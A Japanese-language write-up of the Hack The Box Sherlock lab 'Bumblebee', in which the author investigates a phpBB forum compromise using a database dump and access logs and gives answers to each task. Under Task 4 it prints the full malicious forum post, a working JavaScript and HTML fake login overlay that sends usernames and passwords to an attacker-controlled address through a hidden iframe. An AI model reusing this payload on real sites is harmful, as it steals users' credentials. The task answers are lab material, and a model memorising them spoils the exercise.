https://app.hackthebox.com/sherlocks/Bumblebee
Hack The Box Sherlocksとは
Sherlock Scenario
An external contractor has accessed the internal forum here at Forela via the Guest WiFi and they appear to have stolen credentials for the administrative user! We have attached some logs from the forum and a full database dump in sqlite3 format to help you in your investigation.
外部請負業者がゲスト Wi-Fi 経由で Forela の内部フォーラムにアクセスし、管理ユーザーの資格情報を盗んだようです。調査に役立つように、フォーラムからのいくつかのログと sqlite3 形式の完全なデータベース ダンプを添付しました。
webサーバのログとデータベースダンプが与えられる。
Tasks
Task 1
What was the username of the external contractor?
外部請負業者のユーザー名は何でしたか?
データベースダンプを見てみよう。
$ sqlitebrowser phpbb.sqlite3
をして巡回する。
ユーザー情報が入ってそうなphpbb_users
テーブルを見て、一番最後のユーザー名を答えると正答だった。
apoole1
Task 2
What IP address did the contractor use to create their account?
請負業者はアカウントの作成にどの IP アドレスを使用しましたか?
Task 1と同じテーブルにIPアドレスも書いてある。
10.10.0.78
Task 3
What is the post_id of the malicious post that the contractor made?
業者が行った悪質な投稿のpost_idは何ですか?
Task 1と同じテーブルからuser_idが52と分かる。
postが書いてありそうなphpbb_posts
を見てみると、
poster_id=52のポストが見つかる。
そのpost_idは9だった。
9
Task 4
What is the full URI that the credential stealer sends its data to?
資格情報スティーラーがデータを送信する完全な URI は何ですか?
同様にphpbb_posts
を見ると投稿内容も保存されている。
<div><style>body { z-index: 100;}.modal { position:fixed; top:0; left:0; height:100%; width:100%; z-index:101; background-color:white; opacity:1;}.modal.hidden { visibility: hidden;}</style><script type="text/javascript">function sethidden(){ const d = new Date(); d.setTime(d.getTime() + (24*60*60*1000)); let expires = "expires="+ d.toUTCString(); document.cookie = "phpbb_token=1;" + expires + ";"; var modal = document.getElementById('zbzbz1234'); modal.classList.add("hidden");}document.addEventListener("DOMContentLoaded", function(event) { let cookieexists = false; let name = "phpbb_token="; let cookies = decodeURIComponent(document.cookie); let ca = cookies.split(';'); for(let i = 0; i < ca.length; i++) { let c = ca[i]; while(c.charAt(0) == ' ') { c = c.substring(1); } if(c.indexOf(name) == 0) { cookieexists = true; } } if(cookieexists){ return; } var modal = document.getElementById('zbzbz1234'); modal.classList.remove("hidden");});</script><iframe name="hiddenframe" id="hiddenframe" style="display:none"></iframe> <div class="modal hidden" id="zbzbz1234" onload="shouldshow"> <div id="wrap" class="wrap"> <a id="top" class="top-anchor" accesskey="t"></a> <div id="page-header"> <div class="headerbar" role="banner"> <div class="inner"> <div id="site-description" class="site-description"> <a id="logo" class="logo" href="./index.php" title="Board index"><span class="site_logo"></span></a> <h1>forum.forela.co.uk</h1> <p>Forela internal forum</p> <p class="skiplink"><a href="#start_here">Skip to content</a></p> </div> <div id="search-box" class="search-box search-header" role="search"> <form action="./search.php" method="get" id="search1"> <fieldset> <input name="keywords" id="keywords1" type="search" maxlength="128" title="Search for keywords" class="inputbox search tiny" size="20" value="" placeholder="Search…"> <button class="button button-search" type="submit" title="Search"> <i class="icon fa-search fa-fw" aria-hidden="true"></i><span class="sr-only">Search</span> </button> <a href="./search.php" class="button button-search-end" title="Advanced search"> <i class="icon fa-cog fa-fw" aria-hidden="true"></i><span class="sr-only">Advanced search</span> </a> </fieldset> </form> </div> </div> </div> <div class="navbar" role="navigation"> <div class="inner"> <ul id="nav-main" class="nav-main linklist" role="menubar"> <li id="quick-links" class="quick-links dropdown-container responsive-menu" data-skip-responsive="true"> <a href="#" class="dropdown-trigger dropdown-toggle"> <i class="icon fa-bars fa-fw" aria-hidden="true"></i><span>Quick links</span> </a> <div class="dropdown"> <div class="pointer"><div class="pointer-inner"></div></div> <ul class="dropdown-contents" role="menu"> <li class="separator"></li> <li> <a href="./search.php?search_id=unanswered" role="menuitem"> <i class="icon fa-file-o fa-fw icon-gray" aria-hidden="true"></i><span>Unanswered topics</span> </a> </li> <li> <a href="./search.php?search_id=active_topics" role="menuitem"> <i class="icon fa-file-o fa-fw icon-blue" aria-hidden="true"></i><span>Active topics</span> </a> </li> <li class="separator"></li> <li> <a href="./search.php" role="menuitem"> <i class="icon fa-search fa-fw" aria-hidden="true"></i><span>Search</span> </a> </li> <li class="separator"></li> </ul> </div> </li> <li data-skip-responsive="true"> <a href="/phpBB3/app.php/help/faq" rel="help" title="Frequently Asked Questions" role="menuitem"> <i class="icon fa-question-circle fa-fw" aria-hidden="true"></i><span>FAQ</span> </a> <li class="rightside" data-skip-responsive="true"> <a href="./ucp.php?mode=login" title="Login" accesskey="x" role="menuitem"> <i class="icon fa-power-off fa-fw" aria-hidden="true"></i><span>Login</span> </a> </li> <li class="rightside" data-skip-responsive="true"> <a href="./ucp.php?mode=register" role="menuitem"> <i class="icon fa-pencil-square-o fa-fw" aria-hidden="true"></i><span>Register</span> </a> </li> </li data-skip-responsive="true"></ul> <ul id="nav-breadcrumbs" class="nav-breadcrumbs linklist navlinks" role="menubar"> <li class="breadcrumbs" itemscope="" itemtype="http://schema.org/BreadcrumbList" style="max-width: 936px;"> <span class="crumb" itemtype="http://schema.org/ListItem" itemprop="itemListElement" itemscope=""><a href="./index.php" itemtype="https://schema.org/Thing" itemprop="item" accesskey="h" data-navbar-reference="index" title="Board index"><i class="icon fa-home fa-fw"></i><span itemprop="name">Board index</span></a><meta itemprop="position" content="1"></span> </li> <li class="rightside responsive-search"> <a href="./search.php" title="View the advanced search options" role="menuitem"> <i class="icon fa-search fa-fw" aria-hidden="true"></i><span class="sr-only">Search</span> </a> </li> </ul> </div> </div> </div> <a id="start_here" class="anchor"></a> <div id="page-body" class="page-body" role="main"> <div class="panel"> <div class="inner"> <div class="content"> <h3>Session Timeout</h3> <br/> <br/> <p>Your session token has timed out in order to proceed you must login again.</p> </div> </div> </div> <form action="http://10.10.0.78/update.php" method="post" id="login" data-focus="username" target="hiddenframe"> <div class="panel"> <div class="inner"> <div class="content"> <h2 class="login-title">Login</h2> <fieldset class="fields1"> <dl> <dt><label for="username">Username:</label></dt> <dd><input type="text" tabindex="1" name="username" id="username" size="25" value="" class="inputbox autowidth"></dd> </dl> <dl> <dt><label for="password">Password:</label></dt> <dd><input type="password" tabindex="2" id="password" name="password" size="25" class="inputbox autowidth" autocomplete="off"></dd> </dl> <dl> <dd><label for="autologin"><input type="checkbox" name="autologin" id="autologin" tabindex="4">Remember me</label></dd> <dd><label for="viewonline"><input type="checkbox" name="viewonline" id="viewonline" tabindex="5">Hide my online status this session</label></dd> </dl> <dl> <dt> </dt> <dd> <input type="submit" name="login" tabindex="6" value="Login" class="button1" onclick="sethidden()"></dd> </dl> </fieldset class="fields1"></div> </div> </div> </form> </div> <div id="page-footer" class="page-footer" role="contentinfo"> <div class="navbar" role="navigation"> <div class="inner"> <ul id="nav-footer" class="nav-footer linklist" role="menubar"> <li class="breadcrumbs"> <span class="crumb"><a href="./index.php" data-navbar-reference="index" title="Board index"><i class="icon fa-home fa-fw" aria-hidden="true"></i><span>Board index</span></a></span> </li> <li class="responsive-menu hidden rightside dropdown-container"><a href="javascript:void(0);" class="js-responsive-menu-link responsive-menu-link dropdown-toggle"><i class="icon fa-bars fa-fw" aria-hidden="true"></i></a><div class="dropdown"><div class="pointer"><div class="pointer-inner"></div></div><ul class="dropdown-contents"></ul></div></li><li class="rightside">All times are <span title="UTC">UTC</span></li> <li class="rightside"> <a href="./ucp.php?mode=delete_cookies" data-ajax="true" data-refresh="true" role="menuitem"> <i class="icon fa-trash fa-fw" aria-hidden="true"></i><span>Delete cookies</span> </a> </li> </ul> </div> </div> <div class="copyright"> <p class="footer-row"> <span class="footer-copyright">Powered by <a href="https://www.phpbb.com/">phpBB</a>® Forum Software © phpBB Limited</span> </p> <p class="footer-row"> <a class="footer-link" href="./ucp.php?mode=privacy" title="Privacy" role="menuitem"> <span class="footer-link-text">Privacy</span> </a> | <a class="footer-link" href="./ucp.php?mode=terms" title="Terms" role="menuitem"> <span class="footer-link-text">Terms</span> </a> </p> </div> <div id="darkenwrapper" class="darkenwrapper" data-ajax-error-title="AJAX error" data-ajax-error-text="Something went wrong when processing your request." data-ajax-error-text-abort="User aborted request." data-ajax-error-text-timeout="Your request timed out; please try again." data-ajax-error-text-parsererror="Something went wrong with the request and the server returned an invalid reply."> <div id="darken" class="darken"> </div> </div> <div id="phpbb_alert" class="phpbb_alert" data-l-err="Error" data-l-timeout-processing-req="Request timed out."> <a href="#" class="alert_close"> <i class="icon fa-times-circle fa-fw" aria-hidden="true"></i> </a> <h3 class="alert_title"> </h3><p class="alert_text"></p> </div> <div id="phpbb_confirm" class="phpbb_alert"> <a href="#" class="alert_close"> <i class="icon fa-times-circle fa-fw" aria-hidden="true"></i> </a> <div class="alert_text"></div> </div> </div> </div> <div> <a id="bottom" class="anchor" accesskey="z"></a> <img src="./cron.php?cron_type=cron.task.core.tidy_warnings" width="1" height="1" alt="cron"></div></div><span>Greetings everyone,<br> <br> I am just a visiting IT Contractor, it's a fantastic company y'all have here.<br> I hope to work with you all again soon.<br> <br> Regards,<br>Alex Poole</span></div>
formが用意されている。その送信先が答え。http://10.10.0.78/update.php
Task 5
When did the contractor log into the forum as the administrator? (UTC)
契約者はいつフォーラムに管理者としてログインしましたか? (UTC)
phpbb_log
を見ると
10.10.0.78 1682506392 LOG_ADMIN_AUTH_SUCCESS
のように記録が残っている。
26/04/2023 10:53:12
Task 6
In the forum there are plaintext credentials for the LDAP connection, what is the password?
フォーラムには LDAP 接続の平文認証情報がありますが、パスワードは何ですか?
DBのphpbb_config
に書いてあった。
Passw0rd1
Task 7
What is the user agent of the Administrator user?
管理者ユーザーのユーザーエージェントとは何ですか?
$ cat access.log | grep 'admin'
で一番最初に出てきたログのUAを答えた。
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Task 8
What time did the contractor add themselves to the Administrator group? (UTC)
請負業者が自分自身を管理者グループに追加したのはいつですか? (UTC)
phpbb_log
を見ると
10.10.0.78 1682506431 LOG_USERS_ADDED a:2:{i:0;s:14:"Administrators";i:1;s:6:"apoole";}
のように記録が残っている。
時刻の1682506431はunix timeっぽいので、UTCで変換すると答えになる。
26/04/2023 10:53:51
Task 9
What time did the contractor download the database backup? (UTC)
請負業者はデータベースのバックアップを何時にダウンロードしましたか? (UTC)
$ cat access.log | grep 'backup' 10.10.0.78 - - [26/Apr/2023:11:56:28 +0100] "GET /adm/index.php?i=acp_database&sid=eca30c1b75dc3eed1720423aa1ff9577&mode=backup HTTP/1.1" 200 3770 "http://10.10.0.27/adm/index.php?i=acp_database&sid=eca30c1b75dc3eed1720423aa1ff9577&mode=backup&action=download" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0" ... 10.10.0.78 - - [26/Apr/2023:12:01:38 +0100] "GET /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz HTTP/1.1" 200 34707 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0" ...
何やら怪しいダウンロード記録があるのでこれを答える。
26/04/2023 11:01:38
Task 10
What was the size in bytes of the database backup as stated by access.log?
access.log に記載されているデータベース バックアップのサイズはバイト単位でどれくらいですか?
Task 9と同じところにファイルサイズも書いてある。
10.10.0.78 - - [26/Apr/2023:12:01:38 +0100] "GET /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz HTTP/1.1" 200 34707 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
34707